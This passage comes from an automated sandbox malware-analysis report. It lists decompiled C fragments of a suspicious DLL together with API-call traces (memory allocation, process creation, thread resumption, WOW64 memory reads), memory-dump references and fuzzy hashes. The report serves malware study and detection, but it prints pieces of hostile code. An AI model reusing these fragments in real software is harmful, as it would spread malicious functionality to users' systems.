				_t5 = E01C1500B(_a4);
				if(_t5 == 0) {
					E01C12F14(_t10, __edi, _a4); // executed
					if(E01C117FF(_t10) != 0) {
						 *0x1c1a2b8 = 1; // executed
					}
					_t8 = E01C134A2(_t11); // executed
					return _t8;
				}
				return _t5;
			}









                0x01c16d32
                0x01c16d3b
                0x01c16d43
                0x01c16d48
                0x01c16d4c
                0x00000000
                0x01c16d4c
                0x01c16d59
                0x01c16d5e
                0x01c16d65
                0x01c16d6b
                0x01c16d77
                0x01c16d79
                0x01c16d79
                0x01c16d83
                0x00000000
                0x01c16d83
                0x01c16d88

                APIs
                • HeapCreate.KERNELBASE(00000000,00400000,00000000,01C11B56,?), ref: 01C16D3B
                • GetTickCount.KERNEL32 ref: 01C16D4F
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: CountCreateHeapTick
                • String ID:
                • API String ID: 2177101570-0
                • Opcode ID: 9cd8db12e093e7ecb3593c0dd707b27d3baf2de8d3e97f09ae5e37c00d7fdedf
                • Instruction ID: b8043c29b05e3631593b129cc5be5870d1e6bec9aaba90fd02d3868554690c8e
                • Opcode Fuzzy Hash: 9cd8db12e093e7ecb3593c0dd707b27d3baf2de8d3e97f09ae5e37c00d7fdedf
                • Instruction Fuzzy Hash: A8E092302C4322EAE7317FB4AC097093AA47F77B44F504424E50BD629CDBB0C050B762
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C9527 Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046D4428: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 046D4461
                  • Part of subcall function 046D4428: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 046D4497
                  • Part of subcall function 046D4428: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 046D44A3
                  • Part of subcall function 046D4428: lstrcmpi.KERNEL32(?,00000000), ref: 046D44E0
                  • Part of subcall function 046D4428: StrChrA.SHLWAPI(?,0000002E), ref: 046D44E9
                  • Part of subcall function 046D4428: lstrcmpi.KERNEL32(?,00000000), ref: 046D44FB
                  • Part of subcall function 046D4428: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 046D454C
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,046EA5C0,0000002C,046C5FC8,04C98E36,?,00000000,046C3B4C), ref: 046C9566
                  • Part of subcall function 046CB45A: GetProcAddress.KERNEL32(?,00000000), ref: 046CB483
                  • Part of subcall function 046CB45A: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,046CE55E,00000000,00000000,00000028,00000100), ref: 046CB4A5
                • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,046EA5C0,0000002C,046C5FC8,04C98E36,?,00000000,046C3B4C,?,00000318), ref: 046C95F1
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                • String ID:
                • API String ID: 4138075514-0
                • Opcode ID: 1eea16ce89d63e8ac09a93a9853927ff6e47f3cdb9ffa3c497d7b358ddb9050c
                • Instruction ID: 7471e7397bb3bf9e0d27dd862bac8d0713a8e5413bec8c9cdcf6f860165e27f1
                • Opcode Fuzzy Hash: 1eea16ce89d63e8ac09a93a9853927ff6e47f3cdb9ffa3c497d7b358ddb9050c
                • Instruction Fuzzy Hash: 5821E671D01229ABCF519FA5DC849EEBFB4FF08714F10812AE914B6250E3356A45CFA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C14EFA Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                Download Yara Rule
                C-Code - Quality: 32%
                			E01C14EFA(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x6f99e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                0x01c14f01
                0x01c14f0e
                0x01c14f10
                0x01c14f13
                0x01c14f58
                0x01c14f60
                0x01c14f66
                0x01c14f6a
                0x00000000
                0x00000000
                0x01c14f17
                0x01c14f22
                0x01c14f25
                0x01c14f56
                0x00000000
                0x00000000
                0x01c14f27
                0x01c14f2a
                0x01c14f31
                0x01c14f35
                0x01c14f3e
                0x01c14f46
                0x01c14f74
                0x01c14f48
                0x01c14f48
                0x00000000
                0x01c14f48
                0x01c14f46
                0x01c14f31
                0x01c14f77
                0x01c14f7e
                0x01c14f7e
                0x00000000

                APIs
                • GetLastError.KERNEL32 ref: 01C14F17
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,01C176DB,00000000,?,?), ref: 01C14F6E
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast
                • String ID:
                • API String ID: 1452528299-0
                • Opcode ID: acfb3612fb9d0ae0eabb46b42b41ec34641f78f356ee3b39e17eccfcd88855dd
                • Instruction ID: a18b1c3a369b33da0958a6fa1877323e5d2b21e047ac3f12c1297dcfdd91de5c
                • Opcode Fuzzy Hash: acfb3612fb9d0ae0eabb46b42b41ec34641f78f356ee3b39e17eccfcd88855dd
                • Instruction Fuzzy Hash: 04018431D40208FBDF249F9AD84CA9EBFB8EB8A710F108026F505D6248C770D744EB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CB4B5 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32(?,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F,00000000,0000000B,?,046C158F,046C158F,00000001,?,00000000), ref: 046CB4CA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 145af1fd92c6d8b508e4ef4784a66fc6c28ddb02dbc4ae960fc4ba3626b11187
                • Instruction ID: bd0730e8537bdffb66f40c4f3675dbe91622f0e0d012b8d48cab3059dea8873f
                • Opcode Fuzzy Hash: 145af1fd92c6d8b508e4ef4784a66fc6c28ddb02dbc4ae960fc4ba3626b11187
                • Instruction Fuzzy Hash: F0316AB1A00215EFDB10DF8AE8869BDB7F4FB14714B9580AEE204AB204E331BD41CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C1134A Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E01C1134A(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x1c1a290, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                0x01c1134f
                0x01c11354
                0x01c11362
                0x01c11368
                0x01c1136c
                0x01c113dd
                0x01c1136e
                0x01c11372
                0x01c11375
                0x01c11378
                0x01c1137f
                0x01c11380
                0x01c11381
                0x01c11385
                0x01c11388
                0x01c1138f
                0x01c11395
                0x01c11396
                0x01c11396
                0x01c1139d
                0x01c1139e
                0x01c1139f
                0x01c113a3
                0x01c113af
                0x01c113b5
                0x01c113b6
                0x01c113b6
                0x01c113b8
                0x01c113be
                0x01c113c0
                0x01c113c5
                0x01c113c6
                0x01c113c6
                0x01c113cc
                0x01c113d5
                0x01c113d7
                0x01c113da
                0x01c113e9

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01C11362
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 48474916b2d78d5fb7336dd555cccbb24ed4bfef8c4bdc90f8dbf000ceb89aa9
                • Instruction ID: 786af47e924cf61f97a6cd59d9ec0ecae4c3ab7ba99ab6d32651837d90351f62
                • Opcode Fuzzy Hash: 48474916b2d78d5fb7336dd555cccbb24ed4bfef8c4bdc90f8dbf000ceb89aa9
                • Instruction Fuzzy Hash: 1411E431286344DFEB168F2DC451BED7BA5EB67758F58408AE5409B296C27BC60BC720
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CB6E7 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32(?,00000003,046ED514,00000000,005A95A8,?,046CB526,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046CB722
                  • Part of subcall function 046DD6E3: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,046EE480), ref: 046DD6FA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HandleInformationModuleProcessQuery
                • String ID:
                • API String ID: 2776635927-0
                • Opcode ID: 52787008b7387df6362134d8d454b756b59bb1a19ce0cc72a921ec05567ead9d
                • Instruction ID: 24057c4a9668a708fc1bf52b3d5ee21d67e1a58a804c20e87ddb8db1f8783343
                • Opcode Fuzzy Hash: 52787008b7387df6362134d8d454b756b59bb1a19ce0cc72a921ec05567ead9d
                • Instruction Fuzzy Hash: 59219075A40205AFDB20DF99E88297A77E9EF64BA4724442EEC45DB310F672F900CB70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C380B Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 046C385D
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: b75f49ae64518d929c0dff5f31ca5824d44965c90eede299fca69bc718764e6f
                • Instruction ID: 36d7898bd2277ebad357e427ea731cddabf8b140084f6703287ed6484e1cf0c6
                • Opcode Fuzzy Hash: b75f49ae64518d929c0dff5f31ca5824d44965c90eede299fca69bc718764e6f
                • Instruction Fuzzy Hash: 80111E32201209AFDF018FA9DC409EA7BA9FF59374B058129FD1996260D736ED21DB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C1167E Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 34%
                			E01C1167E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x1c1a2d8; // 0x55d5a8
				_t4 = _t15 + 0x1c1b39c; // 0x2178944
				_t20 = _t4;
				_t6 = _t15 + 0x1c1b124; // 0x650047
				_t17 = E01C151C7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E01C12E50(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                0x01c11688
                0x01c1168a
                0x01c11691
                0x01c11692
                0x01c11693
                0x01c11694
                0x01c1169a
                0x01c1169f
                0x01c1169f
                0x01c116a9
                0x01c116bb
                0x01c116c2
                0x01c116f1
                0x01c116c4
                0x01c116c9
                0x01c116ee
                0x01c116cb
                0x01c116ce
                0x01c116d5
                0x01c116e0
                0x01c116d7
                0x01c116da
                0x01c116da
                0x01c116e4
                0x01c116e4
                0x01c116c9
                0x01c116f8

                APIs
                  • Part of subcall function 01C151C7: SysFreeString.OLEAUT32(?), ref: 01C152A6
                  • Part of subcall function 01C12E50: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,01C16B5B,004F0053,00000000,?), ref: 01C12E59
                  • Part of subcall function 01C12E50: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,01C16B5B,004F0053,00000000,?), ref: 01C12E83
                  • Part of subcall function 01C12E50: memset.NTDLL ref: 01C12E97
                • SysFreeString.OLEAUT32(00000000), ref: 01C116E4
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: FreeString$lstrlenmemcpymemset
                • String ID:
                • API String ID: 397948122-0
                • Opcode ID: 7cf8f879fdb7e776abb85eeb203c4b62279dd49876e51f0b5449dad911174deb
                • Instruction ID: 86156676352f287eb592312510e2beecbcea07595cffe6a1884b6aea5f3133e8
                • Opcode Fuzzy Hash: 7cf8f879fdb7e776abb85eeb203c4b62279dd49876e51f0b5449dad911174deb
                • Instruction Fuzzy Hash: 3D01B13159002AFFDF119FA8CC04EAEBBB8FB0A700F080855EB05E6024D7B2D915EB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C6552 Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046CFDC6: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,046EE218,00000000,046C6559,?,046C3875,?), ref: 046CFDE5
                  • Part of subcall function 046CFDC6: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,046EE218,00000000,046C6559,?,046C3875,?), ref: 046CFDF0
                  • Part of subcall function 046CFDC6: _wcsupr.NTDLL ref: 046CFDFD
                  • Part of subcall function 046CFDC6: lstrlenW.KERNEL32(00000000), ref: 046CFE05
                • ResumeThread.KERNEL32(00000004,?,046C3875,?), ref: 046C6567
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                • String ID:
                • API String ID: 3646851950-0
                • Opcode ID: 951ab759f4202ccf95fa9215123fec46c77d44a2ec2f8263cc115fc6bf37817c
                • Instruction ID: 679635f5b0a588bcaf76368ef9d8eda2e696b8f03649e12ba5692bbfa209cb2e
                • Opcode Fuzzy Hash: 951ab759f4202ccf95fa9215123fec46c77d44a2ec2f8263cc115fc6bf37817c
                • Instruction Fuzzy Hash: 21D05E30A44301E6EB316B21CD44B26BEE2DF70A54F50841DF988851A8FB72BC10961D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C17BC5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C17BC5() {

				E01C17D66(0x1c192c4, 0x1c1a128); // executed
				goto __eax;
			}



                0x01c17bb2
                0x01c17bb9

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 055be13df474605ada22762e9d54477220023537783a102ba0ae7d56db4a29dd
                • Instruction ID: 5137264dbd5986fe0fad64ffc9333531a8a0f63bfbbbc7234905245fd86f5291
                • Opcode Fuzzy Hash: 055be13df474605ada22762e9d54477220023537783a102ba0ae7d56db4a29dd
                • Instruction Fuzzy Hash: 81B012C22D9302EC315471461C01C37215CD2C3E10330411FF400C134CE440CD453032
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C17BCF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C17BCF() {

				E01C17D66(0x1c192c4, 0x1c1a124); // executed
				goto __eax;
			}



                0x01c17bb2
                0x01c17bb9

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 0634bd67a990ef28341017cd306d6a2aa8c870b265a3eb5f973433f883b31ad9
                • Instruction ID: f2a8c560c27934fe31d4688934debdab7567f9c874dcff054e91003647b27acd
                • Opcode Fuzzy Hash: 0634bd67a990ef28341017cd306d6a2aa8c870b265a3eb5f973433f883b31ad9
                • Instruction Fuzzy Hash: A3B012D22D9202EC311471461D01C3721ACD1C3E10330401FF000C134CE440CE063032
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C17BD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C17BD9() {

				E01C17D66(0x1c192c4, 0x1c1a120); // executed
				goto __eax;
			}



                0x01c17bb2
                0x01c17bb9

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 900610c941904d756482cd50ab77b50635cf15537e911b87cb426dd7d11c1972
                • Instruction ID: 1b388d390158865b4b808d2464875701c08bcbd808d2284265a115c5d1341832
                • Opcode Fuzzy Hash: 900610c941904d756482cd50ab77b50635cf15537e911b87cb426dd7d11c1972
                • Instruction Fuzzy Hash: 45B012C32D9206EC311471461C01C37215CE1C3E20330411FF000C134CE440CD053032
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C17BE3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C17BE3() {

				E01C17D66(0x1c192c4, 0x1c1a11c); // executed
				goto __eax;
			}



                0x01c17bb2
                0x01c17bb9

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 0f64828efa4cf9ee80e8d9edf78c7e08626f442fc09e7ef7f003e2bb72638b60
                • Instruction ID: eb303246207d7efa188bc18898ff6cd0e902edb49f7ee198b9af2179f71a8197
                • Opcode Fuzzy Hash: 0f64828efa4cf9ee80e8d9edf78c7e08626f442fc09e7ef7f003e2bb72638b60
                • Instruction Fuzzy Hash: 47B012C22D9202EC312472561C02C37210CD1C3E10330801EF400C134CE440CD053032
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C17BED Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C17BED() {

				E01C17D66(0x1c192c4, 0x1c1a118); // executed
				goto __eax;
			}



                0x01c17bb2
                0x01c17bb9

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: c3f47a7261d0db25c40beaed6a375a7c060c207337310e7fef549144e1274f77
                • Instruction ID: c9ac8686e884946438c6497dd15ca0acc92145bbff51f782e507feffc583a0df
                • Opcode Fuzzy Hash: c3f47a7261d0db25c40beaed6a375a7c060c207337310e7fef549144e1274f77
                • Instruction Fuzzy Hash: 4FB012C26D9302EC316471561C02C37210CD2C3E10330811EF400C134CE440CD453032
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C17BF7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C17BF7() {

				E01C17D66(0x1c192c4, 0x1c1a114); // executed
				goto __eax;
			}



                0x01c17bb2
                0x01c17bb9

                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 01C17BB2
                  • Part of subcall function 01C17D66: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01C17DDF
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: ExceptionHelper2@8LoadRaise___delay
                • String ID:
                • API String ID: 123106877-0
                • Opcode ID: 441dad0cd75f28dff6ca007d9e36d0d1dbbb62533b9cf0358b4e5d597525527e
                • Instruction ID: b40d406166262c5728fd965003428a3d2d9a66f77cdae839b4b0c4e9766715a1
                • Opcode Fuzzy Hash: 441dad0cd75f28dff6ca007d9e36d0d1dbbb62533b9cf0358b4e5d597525527e
                • Instruction Fuzzy Hash: F0B012C22D9202EC312471565D02C37210CD1C3E10330401EF000C134CE440CE063032
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C17BA0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                C-Code - Quality: 100%
